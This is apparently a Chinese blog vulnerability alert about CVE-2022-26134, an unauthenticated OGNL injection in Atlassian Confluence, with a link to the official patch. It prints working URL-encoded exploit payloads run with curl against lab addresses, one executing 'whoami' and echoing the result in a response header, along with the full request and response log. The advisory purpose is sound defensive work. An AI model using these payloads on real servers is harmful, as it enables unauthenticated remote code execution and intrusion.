【漏洞预警】Atlassian 修复了Confluence的0DAY漏洞(OGNL注入漏洞 CVE-2022-26134):无需要身份验证的远程代码执行漏洞

最新推荐文章于 2023-10-09 18:04:15 发布
最新推荐文章于 2023-10-09 18:04:15 发布
阅读量617 收藏
点赞数
分类专栏: 漏洞管理 文章标签: 安全 服务器 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/testvaevv/article/details/125130704
版权

 

前言

知名软件厂商Atlassian发布了安全更新,用于修复Confluence 和 数据中心的一个关键的0Day漏洞,此漏洞正在被黑客疯狂的攻击暴露在互联网的服务器。

此0Day漏洞(CVE-2022-26134)影响所有 Confluence Server 和 Data Center版本,并且允许未经身份验证的攻击者在未打补丁的服务器上执行远程代码。

安全厂商Rapid7已经在其官网披露相关技术细节。此漏洞是一个影响http服务器的OGNL注入漏洞。可以通过将利用代码放置于URL中来执行。例如:

 

curl -v http://10.0.0.111/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/ 
 

通过请求创建文件:
 

${@java.lang.Runtime@getRuntime().exec("touch /tmp/r7")} 
 

也可以在返回代码中执行命令 whoami,可以查看返回中的X-Cmd-Responsed的响应内容。
 

curl -v http://10.0.0.28:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
*   Trying 10.0.0.28:8090...
* TCP_NODELAY set
* Connected to 10.0.0.28 (10.0.0.28) port 8090 (#0)
> GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
> Host: 10.0.0.28:8090
> User-Agent: curl/7.68.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 
< Cache-Control: no-store
< Expires: Thu, 01 Jan 1970 00:00:00 GMT
< X-Confluence-Request-Time: 1654212503090
< Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly
< X-XSS-Protection: 1; mode=block
< X-Content-Type-Options: nosniff
< X-Frame-Options: SAMEORIGIN
< Content-Security-Policy: frame-ancestors 'self'
< X-Cmd-Response: confluence 

 

修复与补丁
 

官方已经发布补丁,可以前往安装https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

                

        

        

    




            

                    
            

    

      

        

            

              
                
                  信息安全方案
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  2
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
OGNL漏洞原理与解决方案

				
			

			

				

					MoYanHanHuiLengMa的博客
				

				

					12-09
					
					1454
					
				

			

		

		

			
				
一,漏洞存在的地方和原理

Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数:

Java代码

?user.address.city=Bishkek&user['favoriteDrink']=kumys...

			
		

	



                

              
                



	

		

			

				
					
Nginx代理出现403问题分析

				
			

			

				

					m0_47495420的博客
				

				

					07-06
					
					1540
					
				

			

		

		

			
				
背景最近在处理一个业务场景问题:项目需要调用某个系统的接口,但是那个系统因为比较历史了,对接口调用来源ip有严格限制,需要将来源ip添加为白名单,但是我们项目的这个工具是使用的serverless平台,无法知道具体的机器 ip,scf是即时性资源,因此来源ip肯定是变化的,因此决定通过一个代理来转发。nginx配置通过nginx来进行接口转发(nginx采用statefulset的固定ip部署),...

			
		

	



                


  
              

                


	

		

			

				
					
Atlassian 紧急修复已遭利用的 Confluence 0day

					
最新发布

				
			

			

				

					smellycat000的专栏
				

				

					10-09
					
					427
					
				

			

		

		

			
				
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士澳大利亚软件公司 Atlassian 紧急修复了位于 Cofluence Data Center and Server 软件中的一个严重的已遭利用的 0day 漏洞CVE-2023-22515,其CVSS评分为满分10分。该公司提到,“从一些客户处获知,外部攻击者可能已经利用了位于可公开访问呢的 Confluence Data Center an...

			
		

	





	

		

			

				
					
CVE-2022-26134 Confluence远程命令执行漏洞复现

				
			

			

				

					weixin_48421613的博客
				

				

					06-05
					
					5930
					
				

			

		

		

			
				
CVE-2022-26134 Confluence远程命令执行漏洞复现

			
		

	



		

			
		



	

		

			

				
					
CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现

				
			

			

				

					m0_72717546的博客
				

				

					09-26
					
					249
					
				

			

		

		

			
				
Confluence是一个专业的知识库协同工具,它可以进行企业知识管理与软件协同,是一个利于构建企业WIKI的Web应用。Confluence使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。是企业中强大的信息读取、存放的共享平台。在受影响的 Confluence Server 和 Data Center 版本中,存在一个 OGNL 注入漏洞,允许未经身份验证的攻击者在 Confluence Server 或数据中心实例上执行任意代码

			
		

	





	

		

			

				
					
HTTP 请求与响应

				
			

			

				

					sinat_38021004的博客
				

				

					06-25
					
					4574
					
				

			

		

		

			
				
请求与响应模型



如何发送请求?

用 Chrome 地址栏
	用 curl 命令
	发送请求的工具叫做 【用户代理】,英文名 User Agent
如何做出一个响应?

node.js 的 http 模块可以做到


1


注意事项

这些代码就是服务器代码,一般放在服务器上
	path是不带查询参数的路径/x
	query是查询参数的对象形式{a:'1'}
	queryString是查询参数的字符串形式?a=1
	pathWithQuery是带查询参数的路径,一般不用
	request是请求对象


			
		

	





	

		

			

				
					
docker-atlassian-confluence:打包在Docker映像中的Atlassian Confluence

				
			

			

				

					02-16
				

			

		

		

			
				
docker run --detach --publish 8090:8090 cptactionhank/atlassian-confluence:latest  然后只需将您喜欢的浏览器导航到http://[dockerhost]:8090并完成配置。 配置 您可以通过提供以下环境变量来配置少量内容 环境...

			
		

	





	

		

			

				
					
docker-atlassian-confluence-data-center:Dockerized Atlassian Confluence Data Center 用于插件开发期间的本地测试

				
			

			

				

					05-29
				

			

		

		

			
				
Docker Atlassian Confluence 数据中心 使用 Docker 启动,以便在插件开发期间进行本地测试。  它启动一个PostgreSQL数据库,几个Confluence群集节点和Apache2 HTTPD作为粘性会话负载平衡器。 共享的 confluence-...

			
		

	





	

		

			

				
					
Atlassian-Confluence-Trojan:Atlassian-Confluence-Trojan

				
			

			

				

					05-17
				

			

		

		

			
				
Atlassian-Confluence-Trojan Ref: Atlassian-Confluence-Trojan  Get a shell by deploy this Trojan-Marco  制作方法:  先将quote-macro-1.0.jar解压  将 UpdateMethod.java 中的{path}替换为目录的绝对路径 然后...

			
		

	





	

		

			

				
					
atlassian-python-api:Atlassian Python REST API包装器

				
			

			

				

					02-05
				

			

		

		

			
				
atlassian-python-api】是一个专为Python开发者设计的库,它提供了一个简洁的接口来与Atlassian产品(如Jira、Confluence、Bamboo、Bitbucket、Crowd、Tempo和Xray等)的REST API进行交互。这个API包装器使得与...

			
		

	





	

		

			

				
					
docker-atlassian:基于docker容器的JIRA软件和Confluence的docker-compose业务流程

				
			

			

				

					02-06
				

			

		

		

			
				
docker-atlassian:基于docker容器的JIRA软件和Confluence的docker-compose业务流程

			
		

	





	

		

			

				
					
高危漏洞预警 | Atlassian Confluence OGNL注入命令执行漏洞复现与分析报告

				
			

			

				

					Fortinet_CHINA的博客
				

				

					06-16
					
					1733
					
				

			

		

		

			
				
近日,Volexity(volexity.com,以下简称为:Volexity)在对从Confluence Server系统收集到的数据进行彻底审查后,发现了攻击者启动Exp以实现远程代码执行,随后Volexity重新创建了该漏洞的利用并在最新版本的Confluence Server上进行了复现。Atlassian 已确认该漏洞,并上报给CVE,确认漏洞编号为“ CVE-2022-26134。Fortinet 中国安全团队针对此次漏洞信息,进行即时响应并成功验证。......

			
		

	





	

		

			

				
					
Java表达式注入OGNL 表达式注入

				
			

			

				

					GalaxySpaceX的博客
				

				

					08-23
					
					1816
					
				

			

		

		

			
				
Java表达式注入OGNL 表达式注入

			
		

	





	

		

			

				
					
Docker API  /Ubnutu

				
			

			

				

					m0_49672766的博客
				

				

					11-21
					
					196
					
				

			

		

		

			
				
root@tie-ubnutu-2004:/etc/default# vim /etc/default/docker 
root@tie-ubnutu-2004:/etc/default# cat /etc/default/docker 
# Docker Upstart and SysVinit configuration file

#
# THIS FILE DOES NOT APPLY TO SYSTEMD
#
#   Please see the documentation for "system

			
		

	





	

		

			

				
					
CVE-2022-26134Confluence OGNL RCE 漏洞

				
			

			

				

					weixin_45742777的博客
				

				

					09-09
					
					7723
					
				

			

		

		

			
				
CVE-2022-26134Confluence OGNL RCE 漏洞

			
		

	





	

		

			

				
					
【风险预警Confluence Wiki OGNL注入漏洞CVE-2022-26134

				
			

			

				

					murphysec的博客
				

				

					06-04
					
					4546
					
				

			

		

		

			
				
6月4日,墨菲安全实验室监测发现Atlassian修复Confluence Server 和 Confluence Data Center 中的OGNL注入漏洞Atlassian Confluence是企业常用的wiki系统,攻击者无需认证可利用漏洞Confluence Server 或 Confluence Data Center 系统中执行任意代码。CVSS评分为9.8分,评级为严重,按照官方描述该漏洞受影响版本为:所有受支持的 Confluence Server 和 Confluence Dat

			
		

	





	

		

			

				
					
详述近期遭利用的 Atlassian Confluence OGNL 注入漏洞 (CVE-2021-26084)

				
			

			

				

					smellycat000的专栏
				

				

					10-14
					
					2349
					
				

			

		

		

			
				
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士趋势科技公司的研究团队详述了CVE-2021-26084 的根因。Atlassian Confluence Server and Dat...

			
		

	





	

		

			

				
					
将war包发布到maven私服测试2(验证结果失败)

				
			

			

				

					职场菜白
				

				

					07-04
					
					1101
					
				

			

		

		

			
				
将war包发布到maven私服测试2(验证结果失败)

			
		

	





	

		

			

				
					
Confluence OGNL 注入 (CVE-2022-26134)

				
			

			

				

					weixin_47515220的博客
				

				

					09-26
					
					1792
					
				

			

		

		

			
				
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于网络的企业 wiki。2022 年 6 月 2 日,Atlassian 发布了针对其 Confluence Server 和数据中心应用程序的安全公告,强调了一个严重严重的未经身份验证远程代码执行漏洞OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码

			
		

	





	

		

			

				
					
斗象-2023攻防演练必修高危漏洞集合(水印)

				
			

			

				

					08-11
				

			

		

		

			
				
高危风险漏洞一直是企业网络安全防护的薄弱点,也成为HW 攻防演练期间
红队的重要突破口;每年HW 期间爆发了大量的高危风险漏洞成为红队突破网络
边界防护的一把利器,很多企业因为这些高危漏洞而导致整个防御体系被突破、
甚至靶标失守而遗憾出局。
HW 攻防演练在即,斗象情报中心依托漏洞盒子的海量漏洞数据、情报星球
社区的一手漏洞情报资源以及Freebuf 安全门户的安全咨询进行分析整合,输出
HW 必修高危漏洞手册,意在帮助企业在HW 攻防演练的前期进行自我风险排查,
降低因高危漏洞而“城池失守”的风险。
本次报告整合了近两年在攻防演练被红队利用最频繁且对企业危害较高的
漏洞,包含了详细的漏洞基础信息、检测规则和修复方案,企业可根据自身资产
信息进行针对性的排查、配置封堵策略和漏洞修复相关工作。
斗象智能安全PRS 已支持详细检测规则,如需要协助请联系:400-156-986
6
HW 必修高危漏洞集合持续更新中,请持续关注。

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 2

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
信息安全方案

			
搜索「我的资源」,获取免费下载

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值